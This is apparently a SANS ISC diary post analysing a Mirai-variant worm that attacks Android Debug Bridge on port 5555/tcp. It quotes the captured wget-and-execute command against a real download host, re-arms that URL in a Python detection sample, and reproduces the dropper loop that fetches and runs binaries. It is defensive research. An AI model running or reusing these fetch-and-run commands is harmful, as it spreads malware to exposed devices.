SANS ISC: Worm (Mirai?) Exploiting Android Debug Bridge (Port 5555/tcp)

Today, I noticed a marked increase in port 5555 scans.

[Figure: port 5555 traffic, July 10th 2018]

Our honeypot detected odd traffic on this port:

OPEN]+shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95 .215 .62.169/adbs -O -> adbs; sh adbs; rm adbs

Note that our honeypot has a web server listening on this port, so it is not going to respond to this sequence. As it turns out, this command is directed at the Android Debug Bridge (ADB), an optional debugging feature of the Android operating system. Recently, researchers discovered that this feature appears to be enabled, and reachable over the network, on some Android phones [1]. ADB normally listens only on USB; `adb tcpip 5555` (which sets the service.adb.tcp.port property) makes adbd listen on 5555/tcp instead. The feature gives full shell access to the phone, so on an exposed device the command above would be executed. On a device you control, `adb shell getprop service.adb.tcp.port` tells you whether adbd has been switched to TCP: an empty value or 0 means USB only.
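To see what the honeypot actually received, it helps to decode the bytes as ADB wire-protocol messages rather than as text. The "OPEN" at the start of the captured line is the 24-byte ADB message header (command, two arguments, payload length, payload checksum and a magic value), followed by the "shell:<command>" service string. The following is an added example, not code from the original diary or from the Android project: it builds two constructed messages that mirror the capture (an OPEN of the shell service carrying the honeypot's command, and the CNXN handshake an ADB client sends first), validates the header, and flags shell payloads that fetch and run a second stage, with any URL found reported in defanged form. The local-id, version and maxdata values in the constructed packets are assumptions.

```python
"""Decode ADB wire-protocol messages seen on 5555/tcp and flag shell
payloads that fetch and execute a second stage.

Added example for this diary; not code from the original post or from
the Android project.  Packets below are CONSTRUCTED to mirror the
honeypot capture; the download URL is the one quoted in the diary.
"""
import re
import struct

# ADB message header: command, arg0, arg1, data_length, data_check, magic
# (six little-endian uint32 values; magic is the bitwise NOT of command).
HEADER = struct.Struct("<6I")
A_CNXN = int.from_bytes(b"CNXN", "little")
A_OPEN = int.from_bytes(b"OPEN", "little")

URL_RE = re.compile(rb"https?://[^\s'\"<>|;&]+")
FETCH_RE = re.compile(rb"\b(busybox\s+)?(wget|curl|tftp)\b")


def adb_checksum(data: bytes) -> int:
    """Payload check used by the classic ADB protocol: byte sum mod 2**32."""
    return sum(data) & 0xFFFFFFFF


def build_message(command: int, arg0: int, arg1: int, payload: bytes) -> bytes:
    """Assemble one ADB message (header + payload) the way adb itself does."""
    header = HEADER.pack(command, arg0, arg1, len(payload),
                         adb_checksum(payload), command ^ 0xFFFFFFFF)
    return header + payload


def parse_message(buf: bytes) -> dict:
    """Validate the header and return the decoded message; raise ValueError
    for anything that is not a well-formed ADB message (e.g. plain HTTP)."""
    if len(buf) < HEADER.size:
        raise ValueError("short ADB header")
    command, arg0, arg1, data_len, data_check, magic = HEADER.unpack_from(buf)
    if magic != command ^ 0xFFFFFFFF:
        raise ValueError("magic does not match command: not ADB")
    data = buf[HEADER.size:HEADER.size + data_len]
    if len(data) != data_len:
        raise ValueError("truncated payload")
    if adb_checksum(data) != data_check:
        raise ValueError("payload checksum mismatch")
    return {"command": command.to_bytes(4, "little").decode("ascii", "replace"),
            "arg0": arg0, "arg1": arg1, "data": data}


def is_adb(buf: bytes) -> bool:
    """True if buf starts with a well-formed ADB message."""
    try:
        parse_message(buf)
        return True
    except ValueError:
        return False


def defang(url: str) -> str:
    """Neutralise a URL for reporting: http -> hxxp, dots in brackets."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def inspect_message(buf: bytes) -> dict:
    """Classify one message: an OPEN of the shell service that calls a
    downloader or carries a URL is the fetch-and-run pattern seen above."""
    msg = parse_message(buf)
    payload = msg["data"].rstrip(b"\x00")
    service, _, command = payload.partition(b":")
    urls = [defang(u.decode("latin-1")) for u in URL_RE.findall(command)]
    fetch = FETCH_RE.search(command) is not None
    suspicious = msg["command"] == "OPEN" and service == b"shell" and (fetch or bool(urls))
    return {"command": msg["command"], "service": service.decode("latin-1"),
            "shell_command": command.decode("latin-1"), "urls": urls,
            "fetch_and_run": fetch, "suspicious": suspicious}


# Constructed samples: the honeypot's command (URL re-armed as it was on the
# wire), the CNXN handshake every ADB client sends first, and an HTTP request
# like the one our own web-server honeypot would expect on this port.
# local-id 1, version 0x01000000 and maxdata 4096 are assumed values.
HONEYPOT_SHELL = (b">/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; "
                  b"busybox wget http://95.215.62.169/adbs -O -> adbs; sh adbs; rm adbs")
SAMPLE_OPEN = build_message(A_OPEN, 1, 0, b"shell:" + HONEYPOT_SHELL + b"\x00")
SAMPLE_CNXN = build_message(A_CNXN, 0x01000000, 4096, b"host::\x00")
SAMPLE_HTTP = b"GET / HTTP/1.1\r\nHost: honeypot\r\n\r\n"

if __name__ == "__main__":
    for name, sample in (("OPEN", SAMPLE_OPEN), ("CNXN", SAMPLE_CNXN)):
        print(name, inspect_message(sample))
    print("HTTP request parses as ADB?", is_adb(SAMPLE_HTTP))
```

Feeding the first 24 bytes plus payload of each 5555/tcp flow through parse_message separates real ADB clients from the HTTP, TLS and random-scanner traffic that also lands on this port; the checksum and magic checks mean a stray "OPEN" inside an HTTP body is not mistaken for an ADB session.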

The initial script downloaded:

# $n (the list of per-platform file names) and $http_server are set at the
# top of the script, which is not reproduced here.
for a in $n
do
    cp /system/bin/sh $a                                  # create the target as a copy of the shell
    busybox wget http://$http_server/adb/$a -O -> $a      # overwrite it with the fetched binary
    chmod 777 $a
done

for a in $n
do
    rm $a                                                 # clean up the dropped binaries
done

The script then downloads the actual "worm" for various platforms and attempts to run them. A quick analysis of the file via VirusTotal suggests that this is a Mirai variant [2].

The initial download URL appears to be hardcoded into the binary. It does not look like it turns the infected system into a web server to spread the malware. Instead, it just refers back to the download server, a data center in Spain (the network has been notified).

Shortly after I downloaded the first binary, the web server became unresponsive. I am not sure if this is due to high load, or due to the ISP taking down the site. VirusTotal has seen related binaries from this host since at least June. Christian Dietrich uploaded a similar binary on June 21st that was received via the more "traditional" telnet attack Mirai uses [3].


Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
ISC Handler
Jul 10th 2018